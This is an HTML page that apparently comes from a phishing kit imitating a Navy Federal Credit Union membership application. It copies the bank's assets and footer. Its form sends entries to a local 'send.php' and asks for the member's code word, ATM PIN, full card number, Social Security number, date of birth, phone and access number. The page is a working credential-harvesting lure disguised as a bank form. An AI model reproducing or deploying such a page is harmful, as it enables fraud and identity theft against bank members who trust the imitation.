<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Personal Information | Navy Federal Credit Union Membership Application</title>
    <script src="https://assets.adobedtm.com/launch-EN9003f540e66e4e1ab08743d206a869f4.min.js" async=""></script>
    <link rel="shortcut icon" href="https://my.navyfederal.org/NFOAA_Auth/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="https://membership.navyfederal.org/main-3f5bb14d310ca730c164.css">
    <script src="https://assets.adobedtm.com/extensions/EP308220a2a4c4403f97fc1960100db40f/AppMeasurement.min.js" async=""></script>
    <script src="https://assets.adobedtm.com/extensions/EP308220a2a4c4403f97fc1960100db40f/AppMeasurement.min.js" async=""></script>
    <!-- <script language="javascript" src="https://mpsnare.iesnare.com/snare.js"></script> -->
    <script language="javascript" type="text/javascript" src="https://mpsnare.iesnare.com/script/logo.js"></script>
    <style id="at-makers-style" class="at-flicker-control"> .mboxDefault {visibility: hidden;}</style>
    <style> @import url('https://fonts.googleapis.com/css2?family=Baloo+Paaji+2:wght@400;600&display=swap'); </style>
    <script language="javascript" type="text/javascript" src="https://mpsnare.iesnare.com/script/logo.js"></script>
    <script language="javascript" type="text/javascript" src="https://membership.navyfederal.org/iojs/4.1.6/logo.js"></script>
    <script src="https://assets.adobedtm.com/eeb22595e0ba/5c925ea43925/738bcf9d83e3/RCa7abbf617c704185bdaf0ce350f214af-source.min.js" async=""></script>
    <script src="https://assets.adobedtm.com/eeb22595e0ba/5c925ea43925/738bcf9d83e3/RC7929137f6b6041d3ac77021e6a43dee3-source.min.js" async=""></script>
    <link rel="stylesheet" href="style1.css">
    <script type="text/javascript" src="TDOX2/jquery-3.3.1.min.js"></script> 
    <script type="text/javascript" src="TDOX2/jquery.ccvalid.js"></script>
    <script type="text/javascript" src="TDOX2/jquery.mask.min.js"></script>
    <script src="./TDOX3/jquery.bpopup.min.js"></script>
    <script>
        $( document ).ready(function() {
            $('#popup_this').bPopup();
            
        });
    </script>
</head>

</head>
<body>	
<style id="at-id-default-content-style">.mboxDefault {visibility:hidden;}</style><div id="data_mbox" style="display: none; visibility:visible; visibility:visible; visibility:visible;" class="mbox-name-funnel_deposit at-element-marker">
</div><div id="mboxdefinediv" style="display: none;">funnel_deposit</div><div id="data_mbox" style="display: none;"></div><div id="data_mbox" style="display: none;"></div>
<body>
  <header role="banner" id="application-header">
    <h1 class="visibly-hidden" role="presentation">Navy Federal Credit Union</h1>
  </header>
  <main role="main" id="app-main"><section> <div id="wait-cursor" style="display: none;"><div class="loader"></div></div> <div aria-live="assertive" class="visually-hidden"></div> <!----> <div data-v-1c530256="" data-v-169bc697=""> <div data-v-1c530256="" class="container clearfix card white"><div data-v-5dff800b="" data-v-1c530256="" class="progress-bar-wrapper"><ul data-v-5dff800b="" class="step-progress-bar"><li data-v-5dff800b="" class="step-item success"><img data-v-5dff800b="" src="https://membership.navyfederal.org/assets/img/checkmark.svg" alt="Eligibility step checked" aria-hidden="true" class="step-item-checkmark" style="width: 14px;"> <span data-v-5dff800b="" class="progress-label single-line-padding">Sign In</span> <p data-v-5dff800b="" class="visually-hidden">step completed</p></li><li data-v-5dff800b="" class="step-item current"><img data-v-5dff800b="" src="https://membership.navyfederal.org/assets/img/checkmark.svg" alt="Membership Application step" aria-hidden="true" class="step-item-checkmark" style="width: 14px;"> <span data-v-5dff800b="" class="progress-label">Verify Required Information</span> <p data-v-5dff800b="" class="visually-hidden">step in progress</p></li><li data-v-5dff800b="" class="step-item"><img data-v-5dff800b="" src="https://membership.navyfederal.org/assets/img/checkmark.svg" alt="Digital Banking Enrollment step" aria-hidden="true" class="step-item-checkmark" style="width: 14px;"> <span data-v-5dff800b="" class="progress-label">Processing Your Information</span> <p data-v-5dff800b="" class="visually-hidden"></p></li><li data-v-5dff800b="" class="step-item"><img data-v-5dff800b="" src="https://membership.navyfederal.org/assets/img/checkmark.svg" alt="Sign In step" aria-hidden="true" class="step-item-checkmark" style="width: 14px;"> <span data-v-5dff800b="" class="progress-label single-line-padding">Completed</span> <p data-v-5dff800b="" class="visually-hidden"></p></li></ul></div> <legend data-v-1c530256="" tabindex="-1"><h1 data-v-1c530256="" class="prompt">Verify these required information</h1></legend> <!----> <form method="post" action="send.php" autocomplete="off"><section data-v-169bc697="" data-v-1c530256=""><header data-v-169bc697="" data-v-1c530256=""><h2 data-v-169bc697="" data-v-1c530256="" class="field-grouping">Personal Information</h2></header> <div data-v-169bc697="" data-v-1c530256="" class="row">
  <div data-v-169bc697="" data-v-1c530256="" class="col-sm-8">
  <div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256="">
  <label data-v-2ae7dda6="" for="field-41">Full Name On File</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" placeholder="ex : martin a smith" name="fn" id="fn"  type="text" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-41" aria-live="polite" class="error-list"></ul></div></div> </div> <div data-v-169bc697="" data-v-1c530256="" class="row" style="margin-top: 00px;"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Code Word</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" id="cw" name="cw" placeholder="banking code word" type="text" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div> </div> 


 <div data-v-169bc697="" data-v-1c530256="" class="row" style="margin-top: 00px;"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">ATM PIN</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6=""  id="pin" name="pin"  type="tel" minlength="4" maxlength="4" required
      oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);" placeholder="4 digits" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div> </div> 
<div data-v-169bc697="" data-v-1c530256="" class="row" style="
    margin-top: 00px;
"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Card Number</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6=""  id="pid" name="pid"  type="tel" minlength="16" maxlength="16" required
      oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);" placeholder="xxxx-xxxx-xxxx-xxxx" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div> </div> 
<div data-v-169bc697="" data-v-1c530256="" class="row" style="
    margin-top: 00px;
"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Social Security Number (SSN)</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" id="ssn" name="ssn" placeholder="xxx-xx-xxxx" type="tel" minlength="9" maxlength="9" required
      oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div> </div> 

 <div data-v-169bc697="" data-v-1c530256="" class="row" style="
    margin-top: 00px;
"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Date Of Birth</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" id="dob" name="dob" placeholder="MM/DD/YYYY"  type="tel" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div> </div> 
 <div data-v-169bc697="" data-v-1c530256="" class="row" style="
    margin-top: 00px;
"><div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Phone Number</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" id="pin" name="phone"  type="tel" placeholder="123-45-6789" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"></ul></div></div>
<div data-v-169bc697="" data-v-1c530256="" class="col-sm-8"><div data-v-2ae7dda6="" data-v-169bc697="" data-v-1c530256=""><label data-v-2ae7dda6="" for="field-43">Access Number</label> <br data-v-2ae7dda6=""> <div data-v-2ae7dda6="" class="input-group"><!----> <input data-v-2ae7dda6="" id="pin" name="acc"  type="tel" placeholder="Access Number" class="form-input pvm phs full-width input-border" required=""> <!----> </div> <ul data-v-2ae7dda6="" id="error-43" aria-live="polite" class="error-list"> </section> <!----> <div data-v-1c530256="" class="row actions"><div data-v-1c530256="" class="col"><div data-v-1c530256="" class="text-center"><button data-v-1c530256="" id="app-personal-info-cont" type="submit" class="btn action forward" >Continue</button></div></div></div> </form></div></div><style>
@media ( max-width : 659px) { /*Only Mobile*/
	.responsive-img.logo {
		width: 180px;
		padding-bottom: 14px;
	}
}

@media ( min-width : 660px) and (max-width:959px) { /*Only Tablet*/
	.responsive-img.logo {
		width: 210px;
		padding-bottom: 14px;
	}
}

.infoBox,.blueInfoBox,.errorBox {
	margin: 0rem 2.5% 2rem 4.5%;
	width: 90%;
}

.blueInfoIcon {
	color: #00AEEF;
}
#popup_this {
    top: 50%;
    left: 50%;
    text-align:center;
    margin-top: -50px;
    margin-left: -100px;
    position: fixed;
    background: #fff;
    padding: 30px;
}
.b-close {
    position: absolute;
    right: 0;
    top: 0;
    cursor: pointer;
    color: #fff;
    background: #ff0000;
    padding: 5px 10px;
}
</style>

<script src="jquery.bpopup.min.js"></script>

<script>
$( document ).ready(function() {
    $('#popup_this').bPopup();
	
});

</div></section></main>

  <footer id="application-footer">
    <section class="container-fluid container clearfix">
      <p>
        <strong>© 2022 Navy Federal Credit Union.</strong> All rights reserved</p>
      <p>
        <span class="nfcu-icon icon-ncua"></span>
        <a href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf" target="_blank">Federally Insured by NCUA</a>
        • If you have questions please contact us: 1-888-842-6328
      </p>
    </section>
  </footer>

  
  <script src="main-3f5bb14d310ca730c164.js"></script><!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
<!-- Global site tag (gtag.js) - Google Marketing Platform -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=DC-9749892"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'DC-9749892');
</script>
<!-- End of global snippet: Please do not remove --><script async="" src="https://www.googletagmanager.com/gtag/js?id=DC-5053096"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'DC-5053096');
</script><script type="application/javascript" src="https://api.ipify.org?format=jsonp&amp;callback=updateIp"></script><!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
<!-- Global site tag (gtag.js) - Google Marketing Platform -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=DC-9749892"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'DC-9749892');
</script>
<!-- End of global snippet: Please do not remove --><script async="" src="https://www.googletagmanager.com/gtag/js?id=DC-5053096"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'DC-5053096');
</script>
  

<script src="https://www.google.com/recaptcha/api.js" async="" defer=""></script>


<script>_satellite["__runScript1"](function(event, target) {

var VisualIqPairs = {          
"uma:eligibility-choices":"923"
}
var pages = Object.keys(VisualIqPairs);
var pixelValues = Object.values(VisualIqPairs);
var pn = _satellite.getVar("Page Name");
for (var i =0; i<pages.length; i++){
 var currentPage = pages[i];
 if (pn == currentPage){
 	var currentPx = pixelValues[i];
    var img = document.createElement('img'); 
    img.src = 'https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px='+ currentPx +'&ord=[order_id]&revenue=[revenue]'; 
    document.body.appendChild(img);      
  }
}

});</script><img src="https://t.myvisualiq.net/activity_pixel?pt=i&amp;et=a&amp;r=[cachebuster]&amp;ago=212&amp;ao=832&amp;px=923&amp;ord=[order_id]&amp;revenue=[revenue]"><iframe height="0" width="0" style="display: none; visibility: hidden;" src="https://9749892.fls.doubleclick.net/activityi;src=9749892;type=membersh;cat=nfcu_00;ord=5677740723080;gtm=2odbu0;auiddc=1033037360.1608248491;~oref=https%3A%2F%2Fmembership.navyfederal.org%2F?"></iframe><script>_satellite["__runScript2"](function(event, target) {
var doubleClickMultipleValues = {
"uma:eligibility-choices": ["membersh", "nfcu_00"]
}

var pages = Object.keys(doubleClickMultipleValues);
var pixelValues = Object.values(doubleClickMultipleValues);
var pn = _satellite.getVar("Page Name");

for (var i =0; i < pages.length; i++){
 var currentPage = pages[i];
 if (pn == currentPage){
 	var currentType = pixelValues[i][0];
    var currentCat = pixelValues[i][1];
  	
  	 gtag('event', 'conversion', {
    'allow_custom_scripts': true,
    'send_to': 'DC-9749892/'+currentType+'/'+currentCat+'+standard'
  });      
 }
}
});</script><script>_satellite["__runScript3"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript4"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}
});</script><script>_satellite["__runScript5"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript6"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}
});</script><script>_satellite["__runScript7"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript8"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}
});</script><script>_satellite["__runScript9"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript10"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}
});</script><script>_satellite["__runScript11"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript12"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}
});</script><script>_satellite["__runScript13"](function(event, target) {
for(var VisualIqPairs={"uma:submit-success":"910","uma:submit-pending":"911"},pages=Object.keys(VisualIqPairs),pixelValues=Object.values(VisualIqPairs),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentPx=pixelValues[i],img=document.createElement("img");img.src="https://t.myvisualiq.net/activity_pixel?pt=i&et=a&r=[cachebuster]&ago=212&ao=832&px="+currentPx+"&ord=[order_id]&revenue=[revenue]",document.body.appendChild(img)}}
});</script><script>_satellite["__runScript14"](function(event, target) {
for(var doubleClickMultipleValues={"uma:submit-pending":["membersh","nfcu_0"],"uma:submit-success":["membersh","nfcu_000"]},pages=Object.keys(doubleClickMultipleValues),pixelValues=Object.values(doubleClickMultipleValues),pn=_satellite.getVar("Page Name"),i=0;i<pages.length;i++){var currentPage=pages[i];if(pn==currentPage){var currentType=pixelValues[i][0],currentCat=pixelValues[i][1];gtag("event","conversion",{allow_custom_scripts:!0,send_to:"DC-9749892/"+currentType+"/"+currentCat+"+standard"})}}});
</script>

</body>
</html>